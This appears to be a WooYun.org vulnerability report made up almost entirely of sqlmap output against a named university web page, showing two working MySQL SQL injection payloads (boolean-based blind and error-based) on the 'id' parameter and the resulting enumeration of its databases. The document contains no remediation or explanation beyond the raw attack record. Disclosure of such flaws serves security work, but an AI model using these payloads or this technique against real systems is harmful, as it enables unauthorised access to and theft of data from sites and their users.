WooYun.org

https://donkey.cc.ncu.edu.tw/~training/bin/class.php?id=18

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: id=18" RLIKE (SELECT (CASE WHEN (8771=8771) THEN 18 ELSE 0x28 END)) AND "LZgd"="LZgd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=18" AND (SELECT 1551 FROM(SELECT COUNT(*),CONCAT(0x71636a6371,(SELECT (CASE WHEN (1551=1551) THEN 1 ELSE 0 END)),0x7170696f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "UPSi"="UPSi
---
[22:58:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:58:09] [INFO] fetching database names
[22:58:09] [INFO] the SQL query used returns 3 entries
[22:58:09] [INFO] resumed: information_schema
[22:58:09] [INFO] resumed: register
[22:58:09] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] register
[*] test
[22:58:09] [INFO] fetched data logged to text files under '/root/Desktop/sqlmap/output/donkey.cc.ncu.edu.tw'